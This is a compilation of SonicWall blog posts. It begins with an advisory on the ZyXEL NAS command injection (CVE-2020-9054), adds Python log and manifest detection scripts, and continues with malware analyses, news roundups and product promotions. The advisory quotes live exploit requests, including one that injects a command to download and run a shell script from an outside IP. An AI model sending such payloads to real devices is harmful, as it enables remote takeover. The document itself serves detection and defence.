Hackers actively targeting remote code execution vulnerability on ZyXEL devices

SonicWall Capture Labs Threat Research team observed attackers actively targeting Zyxel NAS (Network Attached Storage) and firewall products affected by a remote code execution vulnerability.

Vulnerability | CVE-2020-9054

A NAS system is a storage device connected to a network that allows storage and retrieval of data from a centralized location for authorized network users and heterogeneous clients. ZyXEL NAS devices perform authentication using the weblogin.cgi program. This program fails to properly sanitize the username parameter passed to it. If the username parameter contains an OS command, it allows command injection with the privileges of the web server running on the ZyXEL device. By sending a specially crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code with root privileges on the device.

We observe the request below most often, as attackers scan for vulnerable devices: it sends the command “ls” in the username parameter, and a vulnerable device returns without any error.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf"

On vulnerable devices, the attacker then sends the HTTP GET request below, which changes to the /tmp directory, downloads the shell script test.sh with wget, executes it with sh, and finally removes the script.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24%2Ftest.sh%3Bsh+test.sh%3Brm+test.sh HTTP/1.1"

A quick search on Shodan shows a few hundred affected ZyXEL NAS devices exposed online.
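As an added detection example (not SonicWall's signature logic and not Zyxel code), the Python below flags weblogin.cgi requests whose decoded username parameter carries shell metacharacters. The access-log lines are constructed, modelled on the two requests quoted above plus one POST and one benign login.

```python
"""Flag CVE-2020-9054-style command injection against weblogin.cgi in
web-server access logs. Added example; not SonicWall's or Zyxel's code."""
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines modelled on the two requests quoted in the alert,
# plus one POST (body not logged) and one benign login for comparison.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jun/2020:10:01:02 +0000] "GET /adv,/cgi-bin/weblogin.cgi'
    '?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 200 512',
    '10.0.0.6 - - [25/Jun/2020:10:01:03 +0000] "GET /adv,/cgi-bin/weblogin.cgi'
    '?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24%2Ftest.sh'
    '%3Bsh+test.sh%3Brm+test.sh HTTP/1.1" 200 512',
    '10.0.0.7 - - [25/Jun/2020:10:02:00 +0000] "POST /cgi-bin/weblogin.cgi HTTP/1.1" 200 128',
    '10.0.0.8 - - [25/Jun/2020:10:03:00 +0000] "GET /cgi-bin/weblogin.cgi'
    '?username=alice&password=s3cret HTTP/1.1" 200 128',
]

# Request line inside the quotes of a common-log-format record
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# A NAS account name is plain; anything outside this allowlist is suspect.
USERNAME_ALLOWED = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")
SHELL_META = set(";|&`'\"$#\n")


def query_params(query):
    """Decode key=value pairs split on '&' only, the way the CGI sees them.

    Deliberately not urllib.parse.parse_qs: older Python versions also split
    on ';', which would cut 'admin;cd /tmp;...' off at the first semicolon
    and hide the injected commands from the check.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def check_request(line):
    """Return a finding for one log line, or None if it looks benign.

    Only GET requests carry the username in the request line; a POST body is
    absent from the access log, so that path needs inspection at a proxy/WAF.
    """
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("weblogin.cgi"):
        return None
    for user in query_params(parts.query).get("username", []):
        if USERNAME_ALLOWED.match(user):
            continue
        meta = sorted(c for c in set(user) if c in SHELL_META)
        return {
            "method": m.group("method"),
            "decoded_username": user,
            "metacharacters": meta,
            "severity": "high" if meta else "medium",
        }
    return None


def scan_log(lines):
    """Findings for every line that warrants a look, in log order."""
    return [f for f in (check_request(l) for l in lines) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The allowlist check fires before the metacharacter scan, so a username that is merely unusual (for example non-ASCII) is reported at medium severity rather than ignored.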

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15005 ZyXEL Firewall/NAS Remote Code Execution

Affected Products:

ZyXEL NAS products running firmware version 5.21 and earlier are affected by this vulnerability.

Users are recommended to install the standard firmware patches immediately. No updates are available for NAS products that have reached end-of-support; users of those products are advised not to leave them directly exposed to the internet. If possible, connect them behind a security router or firewall for additional protection.

Find the vendor advisory here.

IOC:

Attacker IPs:


Cybersecurity News & Trends – 06-26-20

Hackers made inroads this week with zero-day threats, massive DDoS attacks and point-of-sale compromises — but there were significant wins for the good guys, too.


SonicWall Spotlight

CEO Outlook 2020 – Bill Conner — CRN

  • CRN recently asked 80 of the industry’s top CEOs — including SonicWall’s Bill Conner — why 2020 will be the launch of the data decade.

MSPs will be forced to fix ‘rushed out’ remote working solutions post-COVID – Sonicwall CEO —  Channel Partner Insight

  • In an interview with CPI, Bill Conner explained that as changes to work patterns are likely to outlast the pandemic, pivoting out of lockdown will mean some of the earlier “temporary” remote working solutions will need to be re-engineered.

The Tel Aviv Tech Startups that are Solving COVID-19 Challenges — Forbes

  • Tel Aviv-based Perimeter 81, a provider of network security-as-a-service that recently completed a $10 million Series A led by SonicWall and existing investors, offers solutions that replace traditional VPNs.

Cybersecurity News

FBI warns K-12 schools of ransomware attacks via RDP —  ZDNet

  • The FBI has issued a security alert warning K-12 schools about ransomware gangs abusing RDP connections to break into school systems.

There are DDoS attacks, then there’s this 809 million packet-per-second tsunami Akamai says it just caught —  The Register

  • The attack, which targeted an unspecified European bank, was the largest such attack Akamai had ever encountered — and CDN believes it may be the largest DDoS attack to hit any network, ever.

This ransomware has learned a new trick: Scanning for point of sales devices — ZDNet

  • Already one of the most dangerous forms of ransomware, Sodinokibi now looks like it could be attempting to make money from stolen payment information, too.

FBI sees major spike in coronavirus-related cyber threats — The Hill

  • FBI’s Internet Crime Complaint Center (IC3) has received 20,000 coronavirus-related cyber threat reports this year — as many as they received in all of 2019.

Republicans propose bill to end ‘warrant-proof’ encryption — The Washington Times

  • Republicans on the Senate Judiciary Committee introduced a bill Tuesday taking on the encryption technology that major tech companies use to secure customer data.

New WastedLocker ransomware demands payments of millions of USD —  ZDNet

  • Evil Corp, one of the biggest malware operations on the planet, has returned to life with a new ransomware strain.

Ransomware operators lurk on your network after their attack —  Bleeping Computer

  • While many believe attackers quickly deploy ransomware and leave so they won’t get caught, in reality threat actors are not so quick to give up a resource that they worked so hard to control.

Phishing and cryptocurrency scams squashed as one million emails are reported to new anti-scam hotline —  ZDNet

  • In the two months since its launch, the UK’s new anti-scam hotline has received an average of 16,500 emails per day, resulting in 10,000 links to online scams either blocked or taken down by authorities.

Hacker arrested for stealing, selling PII of 65K hospital employees — Bleeping Computer

  • 29-year-old Justin Sean Johnson has been arrested for allegedly stealing PII and W-2 information for over 65,000 University of Pittsburgh Medical Center employees and selling it on the dark web.

Security surprise: Four zero-days spotted in attacks on researchers’ fake networks —  ZDNet

  • Previously unknown attacks used against fake systems highlight big problems with industrial systems security.

In Case You Missed It

Cobralocker ransomware actively spreading in the wild

The SonicWall Capture Labs threat research team observed reports of a new variant family of COBRALOCKER ransomware [COBRALOCKER.RSM] actively spreading in the wild.

The COBRALOCKER ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\[Name].<Cobra>

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files and appends the [Cobra] extension onto each encrypted file’s filename.

During our analysis, we noticed the malware using the following key to encrypt the victim’s files (see the source code below).

This makes it easier for us to create a decryptor tool for COBRALOCKER.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signature:

  • GAV: COBRALOCKER.RSM (Trojan)

A Brief History of COVID-19 Related Attacks, Pt. 1

As the world manages voluntary quarantines, mandated isolations, social distancing and “shelter-at-home” edicts, cybercriminals are busy creating malware and other cyberattacks that prey on the fear surrounding the novel coronavirus epidemic (COVID-19).

“More than ever, the public needs to be hyper-aware of the interactions they have online, particularly involving the links and emails they open,” SonicWall Vice President Terry Greer-King told The Sun. “Cybercriminals do their utmost to take advantage of trying times by tricking users into opening dangerous files, through what they consider to be trusted sources.”

While SonicWall Capture Labs threat researchers are constantly investigating and analyzing all threats, the team has flagged the top cyberattacks that leverage coronavirus and COVID-19 to take advantage of human behavior. Here are some of the earliest:

Malicious Archive File: February 5, 2020

In early February, SonicWall Capture Labs used patent-pending Real-Time Deep Memory Inspection (RTDMI) to detect an archive file containing an executable file named CoronaVirus_Safety_Measures.exe. The archive is delivered to the victim’s machine as an email attachment.

After analyzing the executable file, SonicWall found that the file belongs to the GOZ InfoStealer family, which was first detected by SonicWall RTDMI in November 2019.

The GOZ InfoStealer is known for stealing user data from installed applications, along with victims’ system information, which is then sent to the threat actor over Simple Mail Transfer Protocol (SMTP).

The malware author is continuously updating the malware code and changing its infection chain. Details of this analysis are available in this SonicAlert: “Threat Actors Are Misusing Coronavirus Scare To Spread Malicious Executable.”

Coronavirus-Themed Android RAT: February 26, 2020

SonicWall Capture Labs observed a coronavirus scare tactic being used in the Android ecosystem in the form of a Remote Access Trojan (RAT), which is an Android apk that simply goes by the name coronavirus.

After installation and execution, this sample requests that the victim re-enter the pin/pattern on the device and steals it while repeatedly requesting ‘accessibility service’ capabilities.

Upon viewing the code structure (below), it becomes apparent that some form of packing/encoding is being used in this sample. The class names appear random, but have a structure in themselves; most class names are of similar length and equally random.

On inspecting the Manifest.xml files, most of the activities listed are unavailable in the decompiled code. This indicates that the ‘real’ class files will be decrypted during runtime. This is a mechanism that makes it difficult for automated tools to analyze the code and give a verdict.

Details of this analysis are available in this SonicAlert: “Coronavirus-themed Android RAT on the Prowl.”

SonicWall Capture Labs provides protection against these threats with the following signatures:

  • AndroidOS.Spyware.RT (Trojan)
  • AndroidOS.Spyware.DE (Trojan)

COVID-19 Hoax Scareware: March 13, 2020

SonicWall Capture Labs threat researchers observed malware taking advantage of coronavirus (COVID-19) fears, also known as ‘scareware.’ The sample pretends to be ransomware by displaying a ransom note (shown below). In reality, however, it does not encrypt any files.

To scare the victim, a number of security warning messages are displayed:

In the end, the malware is benign and hopes fear and human behavior will force victims into paying the ransom. Details of this analysis are available in this SonicAlert: “COVID-19 Hoax Scareware.”

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Scareware.CoVid_A (Trojan)

Malicious “Marketing Campaign” Propagates Android RAT: March 14, 2020

SonicWall Capture Labs threat researchers discovered and analyzed malicious campaign websites that currently serve (at the time of publication) Android Remote Access Trojan (RAT) belonging to the same family discovered in February 2020 (see below).

Cyberattackers are creating websites that spread misinformation about coronavirus (COVID-19), falsely claiming ways to “get rid of” the novel virus. Instead, the sites attract new victims via download links.

SonicWall found two main variants of this strategy, one in English and another in Turkish. Both serve the apk named corona.apk when the victim clicks on the Google Play image.

Upon downloading the apk file and examining the code, SonicWall found a similar structure to the variant outlined in February. This sample is an Android Remote Access Trojan (RAT) and can perform a number of malicious operations, including:

  • Get information about the device
  • Get a list of apps installed
  • Allow remote control of the device via TeamViewer
  • Steal Gmail password and/or lock pattern
  • Keylogger
  • Upload files
  • Steal SMS messages, contacts
  • Disable Play Protect

There is a lot of misinformation and panic surrounding coronavirus (COVID-19). SonicWall Capture Labs reiterates that there are no mobile apps that can track coronavirus infections or point to a vaccine. Please exercise extreme caution.

Details of this analysis are available in this SonicAlert: “Misinformation Related to Coronavirus Being Used to Propagate Malicious Android RAT.”

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • Spyware.RT (Trojan)
  • Spyware.DE (Trojan)

12-Layer Azorult.Rk: March 16, 2020

SonicWall Capture Labs threat researchers found a new sample and activity for the “coronavirus” binary Azorult.Rk. Malware authors have taken advantage of the public’s desire for information on the COVID-19 pandemic since it was first discovered in December 2019 — and it has only escalated since.

Azorult.Rk masquerades as an application providing diagnosis support, even including a screenshot of a popular interactive tool that maps COVID-19 cases and exposure. It includes 12 different layers of static and dynamic information, making it difficult for threat analysts to quickly investigate. This specific analysis serves as a strong primer on how malware authors mask their motives and tactics.

After sorting through the layers, SonicWall found the malware eventually attempted to transmit statistics and metrics of the physical machine hardware, as well as usernames, hostnames and much more.

Details of this analysis are available in this SonicAlert: “Coronavirus, COVID-19 & Azorult.Rk.”

SonicWall Capture Labs provides protection against this threat with the following signature:

  • GAV: Azorult.RK

Coronavirus Ransomware: March 19, 2020

SonicWall Capture Labs threat researchers have observed a new ransomware threat leveraging coronavirus fear. This ransomware encrypts and zips the files and renames them ‘coronaVi2022@protonmail.ch__<filename>’. It then changes the drive name to coronavirus and drops coronavirus.txt in each and every folder of the infected system.

After modifying registry keys, it adds new keys and shows users the following ransom message:

After 20 minutes, it restarts the victim machine and displays yet another ransom note.

Additional details of this analysis are available in this SonicAlert: “Coronavirus Ransomware.”

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • GAV: CoronaVirus.RSM_2
  • GAV: CoronaVirus.RSM

Work-from-Home VPN Solutions for Remote Workforces

To help organizations cost-effectively implement VPN technology for their rapidly expanding work-from-home employees, SonicWall is making its remote access products and services available to both new and existing customers at deeply discounted rates. We’re also bundling critical security solutions for new enterprise and SMB customers.

This special offer provides free Secure Mobile Access (SMA) virtual appliances sized for enterprises and SMBs, and also includes 50% discounts on Cloud App Security and Capture Client endpoint protection when paired with SMA.

These packages were bundled to include everything needed to protect employees outside the network:

Fraudsters victimizing innocent users through a dubious Android finance app

The COVID-19 pandemic has created a global crisis, and threat actors have worsened the situation by unleashing their malicious handiwork.

The SonicWall Capture Labs threat research team has been blogging regularly about malware threats leveraging the current COVID-19 pandemic. SonicWall has found another Android app using this theme. The app was, until recently, distributed via the Google Play Store; it was removed from the Play Store after we reported it to the concerned team.

The app, named Cashbox, is categorized as a Finance app. It targets Indian Android phone users and is portrayed as an app that helps customers get a loan. The high number of installs indicates that a large number of users may have been victimized:

The fraudulent app seems to have passed unnoticed by security solutions, as illustrated by the fact that it is not detected by any AV vendor on the popular threat intelligence sharing portal VirusTotal:

The app promises to provide easy loans to customers. The app description contains loan EMI and interest details, as shown below:

After installation, it shows a list of required permissions. Interestingly, the app prompts the user to grant permissions by explaining why each permission is required:

The user must first enter the loan amount; the app then asks for the user’s PAN (Permanent Account Number) card and a self-photo taken with the phone camera to be uploaded:

Thereafter, the user is informed that authentication is complete, and the user’s name, PAN card number and date of birth are displayed to look genuine, which reduces suspicion:

Next, it asks the user to make a payment of Rs. 99 through any of four options (Card, UPI, Wallets or Net Banking), as shown below:

Then, other loan-facilitating apps are recommended:

    Recommended apps

All the personal information is requested again if the user decides to use any of the recommended apps. Users are first promised easy loans, but in return their personal information is stolen and yet another loan app is recommended.

Reviews shared by some users of the fraudulent app reflect their frustration:

The code snippet below shows that the app also fetches the user’s location and device information:

SonicWall Capture Labs provides protection against this threat with the following signature:

Android_FraudApp.A (Trojan)

Indicators Of Compromise (IOCs):

1ab6fe4483a77ccffe9876d5426822a57037d6a890382666442342b2704464bb

SonicWall’s Online Community Connects Cybersecurity Professionals

SonicWall recently launched an online community to connect like-minded professionals from around the world. Since the launch, there have been nearly a thousand users who have interacted with one another, each contributing and helping through their own unique technical expertise, personal knowledge and experience.

But what is a community? Gartner defines a community as “a constantly changing group of people collaborating and sharing their ideas over an electronic network.” By bringing together a group of people with a common interest, providing a platform for addressing many readers at once, and facilitating communication in real time, Gartner says, communities are able to optimize their collective power.

We’ve seen this definition come to life with the launch of SonicWall Community—and the benefits are already becoming clear:

  • Exchanging best practices for lowering total cost of ownership through SonicWall solutions.
  • Learning how to maximize the value of SonicWall products.
  • Connecting with product management and support to ask questions, get help or submit an idea.
  • Sharing your experience and expertise with other SonicWall users.

A Truly Engaging Community

At its core, the community enables cybersecurity professionals to connect with one another in relevant and meaningful ways. The community is a place to ask questions, start new discussions, and collaborate with experts from across a variety of industries.

Customers and partners with questions have received relevant and helpful responses by both SonicWall staff and experienced professionals in the field. Members have come together to solve difficult problems. Through collective brainstorming and creativity, issues that may have taken a few days are now solved in half the time.

The community is easy to use and features a variety of ways to find meaningful content. Take advantage of the built-in search to find relevant posts, view the latest discussions, or select from a wide variety of solution categories.

And with the real-time notification option, it’s easy to know when one of your questions has received a response. You can also choose to stay up to date on product notifications, user mentions, issues found in the wild, and more.

The community even has a developer hub for in-depth technical discussions, as well as a virtual “water cooler” to take a break to swap ideas and connect with peers.

The best part about joining the community is that it gives you free, 24/7 access to a wealth of knowledge — and getting started is easy. Simply navigate to community.sonicwall.com and sign in with your existing MySonicWall credentials to start participating. If you don’t have a MySonicWall account, that’s OK. It’s free to create one and takes just a few minutes to sign up.

Join SonicWall Community

Whether you’re just getting started with SonicWall products or you’ve been with us for years, the SonicWall community has something to offer. And if you choose to share your own unique knowledge and experience, you have the potential to help countless others.

Come join the conversation now at community.sonicwall.com.
 

Cybersecurity News & Trends – 06-19-20

This week, SonicWall’s new Switches and Secure SD-Branch made waves, hackers made a stronger Qbot, and attacks on AWS made history.


SonicWall Spotlight

ChannelPro 5 Minute Roundup — ChannelPro Network

  • Erick and Rich of ChannelPro explore the far-reaching implications of SonicWall’s new branch office networking solution, which they say arrived at a great time for businesses.

SonicWall Launches New Network Switches — Enterprise Times

  • SonicWall has announced a range of new products, including new multi-gigabit switches and an SD-Branch solution.

SonicWall Advances Network Edge Security, Adds Multi-gigabit Switch Series and New SD-Branch Capabilities — TMCnet

  • TMCnet highlights SonicWall’s momentum over the past quarter, including the release of new and enhanced MSSP offerings and the launch of its SD-Branch capabilities.

SonicWall takes threat protection to the branch level — MicroScope

  • This article covers SonicWall’s latest SD-Branch offering as a major shift and a milestone in its corporate history, one set to have a major impact on the security player’s channel.

Cybersecurity News

Researchers Expose a New Vulnerability in Intel’s CPUs — Wired

  • Modern CPUs — particularly those made by Intel — have been under siege in recent years by an unending series of attacks. Now, two separate academic teams disclosed two new and distinctive exploits that pierce Intel’s Software Guard eXtension, by far the most sensitive region of the company’s processors.

Google Sees Increase in COVID-19 Phishing in Brazil, India, UK — Security Week

  • Cyberthreats taking advantage of the COVID-19 pandemic are evolving, and Google is seeing an increase in related phishing attempts in some countries.

Attackers impersonate secure messaging site to steal bitcoins — Bleeping Computer

  • In what can be described as the case of both cybersquatting and phishing, threat actors have created a site that imitates the legitimate secure note sharing service privnote.com to steal bitcoins.

Coder-Turned-Kingpin Paul Le Roux Gets His Comeuppance — Wired

  • Paul Le Roux, 47 — who faced up to a life sentence after pleading guilty to crimes ranging from methamphetamine trafficking to selling weapons technology to Iran — has been sentenced to 25 years in federal prison.

Targeting U.S. banks, Qbot trojan evolves with new evasion techniques — SC Magazine 

  • By malware standards, the banking trojan Qbot is long in the tooth, but it still has some bite, according to researchers who say it has added some detection and research evasion techniques to its arsenal.

Hackers Trigger Far-Reaching Disruption by Targeting Low-Profile Firm — The Wall Street Journal

  • Small and midsize companies are fighting a rising tide of cyberattacks largely out of public view, posing an underappreciated risk for the bigger companies and institutions that use their services.

Google Alerts catches fake data breach notes pushing malware — Bleeping Computer

  • Fraudsters have begun pushing fake data breach notifications using big company names to distribute malware and scams. They’re mixing black SEO, Google Sites, and spam pages to direct users to dangerous locations.

Exclusive: Massive spying on users of Google’s Chrome shows new security weakness — Bloomberg

  • A newly discovered spyware effort attacked users through 32 million downloads of extensions to Google’s Chrome web browser, highlighting the tech industry’s failure to protect browsers despite their increasing use for email, payroll and other sensitive functions.

AWS said it mitigated a 2.3 Tbps DDoS attack, the largest ever — ZDNet

  • The previous record for the largest DDoS attack ever recorded was of 1.7 Tbps, recorded in March 2018.

In Case You Missed It

Fake ransomware decryptor spreads Zorab ransomware

SonicWall Capture Labs threat research team observed Zorab ransomware posing as a DJVU ransomware decryptor.

When a user’s files are encrypted by ransomware, the user desperately looks for a tool to decrypt them instead of paying the ransom. One such supposed decryptor, DecryptorDjvuMlagham.exe, does not remove the DJVU ransomware infection; instead, it spreads Zorab ransomware.

Infection cycle

When launched, the application opens a console and asks for relevant information.

However, it accepts any input and does not validate it.

Once the user clicks Start Scan, instead of scanning it extracts another executable called crab.exe to users\AppData\Local\Temp.

Disassembling the code, one can see that crab.exe is extracted on the button click.

This executable then starts encrypting files. The encrypted files have the extension .ZRB. It also encrypts files that were already encrypted by DJVU and changes their extension to .ZRB.

The attacker keeps a ransom note in each folder called -DECRYPT~ZORAB.txt

The ransom note reads as follows and boasts that this is just a business and that they don’t care about the victim. It also demands that the victim write an email to zorab28@protonmail.com for information about how to decrypt the files.

At the time of writing this alert we had not yet received a response to the email that we sent to the attacker.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Zorab.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

This long-spreading Android locker has been spotted using a Coronavirus theme

SonicWall Capture Labs threat research team observed a number of Android locker samples that cover the home screen with a ransom message. We observed a number of malicious apps belonging to this locker campaign that are re-packaged to appear as popular apps such as WhatsApp, Netflix and a recent Coronavirus app named in Uzbek, Koronavirus haqida, which translates to “About Coronavirus.”

We observed samples belonging to this campaign as recent as 2020-06-15 on the popular malware portal VirusTotal.

Infection Cycle

Upon execution, the screen is covered by a warning message; the message varies from app to app. Only some apps from this campaign demand a ransom in exchange for the unlock keys. However, the template used by these ransom messages is somewhat similar:

Translations of some of the messages shown on screen by a few of the malicious lockers in this campaign:

  • “Your Android is Blocked! You have visited or used sites in violation of law”
  • “Android is locked !”
  • “Your phone is coded!”

However, a few apps from this campaign make an effort to stand out:

Startup trigger

Even though the locker does not encrypt files as regular ransomware does, the phone becomes unusable, as buttons do not respond and the screen is covered by the ransom message. At this point a victim may not have many options other than to try and reboot the device.

However, that does not work because of a permission the malicious locker requests: RECEIVE_BOOT_COMPLETED. As soon as the device boots, the locker’s background service, LockService, is triggered; it starts the locker and displays the ransom message over the screen.

Hardcoded unlock key

This locker campaign locks the screen with a ransom message and demands a ransom for an unlock code. However, the unlock code is hardcoded and can be found in the same class file across the samples belonging to this campaign: com.lololo/LockService;->onClick()

The image below shows the hardcoded unlock codes for a few samples:

Easy removal

Because the apps from this campaign do not request dangerous permissions such as BIND_DEVICE_ADMIN and BIND_ACCESSIBILITY_SERVICE, there are no safeguards against their uninstallation from the device. If Developer Tools are enabled on the device, a victim can easily remove this locker by issuing the command below over adb:

  • adb shell pm uninstall com.lololo
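The Python below is an added triage example (not SonicWall's tooling) covering the two traits described above: the boot-completed persistence that relaunches LockService, and the absence of device-admin or accessibility bindings that would otherwise block `pm uninstall`. Both manifests are constructed; the second is a hypothetical counter-example with a device-admin receiver.

```python
"""Triage an Android manifest for the traits the locker campaign above relies
on: boot persistence (RECEIVE_BOOT_COMPLETED plus a BOOT_COMPLETED receiver
that can relaunch the lock service) and the absence of device-admin or
accessibility bindings that would otherwise obstruct uninstallation.
Added example, not SonicWall's tooling; both manifests are constructed."""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # the android: namespace

# Constructed manifest modelled on the campaign's package and service names
LOCKER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.lololo">
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="WhatsApp">
    <service android:name="com.lololo.LockService"/>
    <receiver android:name="com.lololo.BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed counter-example (hypothetical package): a device-admin receiver
# must be deactivated before 'pm uninstall' succeeds, so adb alone is not enough.
ADMIN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.locker">
  <application>
    <receiver android:name=".AdminReceiver"
        android:permission="android.permission.BIND_DEVICE_ADMIN"/>
  </application>
</manifest>"""

BOOT_PERM = "android.permission.RECEIVE_BOOT_COMPLETED"
BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"
# BIND_* permissions are declared on the <receiver>/<service> element via
# android:permission, not in <uses-permission>, so both places are checked.
REMOVAL_BLOCKERS = {
    "android.permission.BIND_DEVICE_ADMIN",
    "android.permission.BIND_ACCESSIBILITY_SERVICE",
}


def triage_manifest(xml_text):
    """Summarise persistence and removability of one manifest."""
    root = ET.fromstring(xml_text)
    package = root.get("package", "")
    uses = {p.get(A + "name") for p in root.iter("uses-permission")}
    # Receivers whose intent filter listens for BOOT_COMPLETED
    boot_receivers = [
        r.get(A + "name") for r in root.iter("receiver")
        if any(a.get(A + "name") == BOOT_ACTION for a in r.iter("action"))
    ]
    bound = {el.get(A + "permission") for el in root.iter()} & REMOVAL_BLOCKERS
    blockers = sorted((uses & REMOVAL_BLOCKERS) | bound)
    services = [s.get(A + "name") for s in root.iter("service")]
    return {
        "package": package,
        "boot_persistence": BOOT_PERM in uses and bool(boot_receivers),
        "boot_receivers": boot_receivers,
        "services": services,
        "removal_blockers": blockers,
        # Matches the removal step in the alert when nothing blocks it
        "adb_removal": None if blockers else f"adb shell pm uninstall {package}",
    }


if __name__ == "__main__":
    for manifest in (LOCKER_MANIFEST, ADMIN_MANIFEST):
        print(triage_manifest(manifest))
```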

Popular Targets

The apps from this campaign are re-packaged with different app names and icons that match popular apps. Some of the apps we observed during our analysis include:

  • WhatsApp
  • Netflix
  • Telegram
  • Grand Theft Auto 5 hacks
  • Minecraft hack
  • King root

With the recent Coronavirus pandemic and malware writers capitalizing on the ‘Coronavirus’ theme to propagate their malware, apps belonging to this campaign might soon carry this theme. We have already identified one sample by the name Koronavirus haqida, and we can expect more apps from this campaign to carry this theme.

SonicWall Capture Labs provides protection against this threat with the following signature:

  • AndroidOS.LockScreen.HM

Indicators Of Compromise (IOC):


Beat the Managed Services Blues with SonicWall and ConnectWise

Are you a managed services provider (MSP or MSSP)? Are you tired of having to manually account for product and services usage by your customers, or hearing your operations team complain about manually creating and triaging tickets for security and product issues?

Have no fear: SonicWall is excited to launch the official integration of ConnectWise Manage with SonicWall’s portfolio of products. ConnectWise Manage is an out-of-the-box and easy-to-use integration that helps automate the invoicing and billing of security services for your customers. In addition, the integration automates the creation and processing of service tickets within ConnectWise Manage, including the automatic closure of tickets when alerts are closed in the product consoles.

SonicWall partners will now see a new menu option in MySonicWall for ConnectWise Integrations, under their My Workspace menu. Navigating to this page will allow them to not only set up the integration with their ConnectWise Manage instance, but also map tenants to companies.

With this integration:

  1. SonicWall hardware, software and cloud products are added to the product catalog, where partners can set their standard prices
  2. Active SonicWall software and cloud products are listed as additions to their company agreements of choice for automated product usage accounting and invoicing
  3. SonicWall hardware and virtual appliances are added as configurations, which can in turn be shared with other automation platforms like IT Glue
  4. Auto-creation of tickets is enabled based on alerts from Capture Client

This integration supports synchronization of all billable SonicWall products, including all current firewalls, Secure Mobile Access appliances, Capture Client, Cloud App Security and Global Management System, among others. While tickets are limited to alerts from Capture Client in this release, subsequent versions will bring alerts from firewall, Cloud App Security, Wireless and more.

Take a look at this video to see the integration in action!

With the recent changes to how you experience MySonicWall, the enhancements to Risk Meters, the recently launched MSSP Program, and now the launch of the ConnectWise Manage integration, if you’re a managed services provider, you can rest assured that SonicWall has your back!

Like what you see but want more? It’s in the works — we already have a ConnectWise Automate integration available as a preview. Feel free to reach out via our Communities if you need more information, and stay tuned for more integrations with other Professional Services Automation (PSA) and Remote Monitoring and Management (RMM) platforms!